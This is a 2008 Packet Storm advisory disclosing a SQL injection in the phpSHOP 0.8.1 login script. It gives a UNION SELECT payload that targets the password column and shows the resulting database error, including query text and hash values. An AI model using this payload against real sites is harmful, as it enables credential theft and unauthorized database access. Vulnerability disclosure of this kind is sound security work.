phpshop081-sql.txt

2008-02-18T00:00:00
ID PACKETSTORM:63724
Type packetstorm
Reporter Anderson Luiz Tamborim
Modified 2008-02-18T00:00:00

Description

                                        
                                            `[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]  
Web Application: phpSHOP 0.8.1 SQL Injection  
  
Description: SQL Injection in Web E-commerce OpenSource application phpSHOP  
in login.php script.  
  
[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]  
  
author: y2h4ck  
e-mail: y2h4ck[ at ] gmail.com  
page: http://y2h4ck.wordpress.com <http://y2h4ck.wordpress.com//>  
  
[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]  
Vuln script: *http://shop/0.8.1/?login=1&&'[EXPLOIT]  
  
* String: /?login=admin'  
+UNION+select/**/null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null  
  
In the login/password input box you can pass some SQL Injection strings to  
manipulate  
the behavior of the mysql Queries to the phpSHOP  
  
Result:  
[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]  
*Database error:* Invalid SQL: SELECT * from auth_user_md5,user_info WHERE  
auth_user_md5.username ="1==1¡ä select ¨C' AND auth_user_md5.password  
='d41d8cd98f00b204e9800998ecf8427e'AND auth_user_md5.password  
='d41d8cd98f00b204e9800998ecf8427e'AND auth_user_md5.user_id =  
user_info.user_id AND user_info.address_type = 'BT'  
  
*MySQL Error*: 1064 (You have an error in your SQL syntax; check the manual  
that corresponds to your MySQL server version for the right syntax to use  
near '1==1¡ä select ¨C' AND auth_user_md5.password  
='d41d8cd98f00b204e9800998ecf8427e'A' at line 1)  
  
[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]  
  
Version: 0.8.1  
Vendor : www.phpshop.org <http://www.phpshop.com/>  
Date: 14/02/2008  
  
[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]  
  
--   
  
Atenciosamente  
Anderson Luiz Tamborim  
Information Security Manager  
`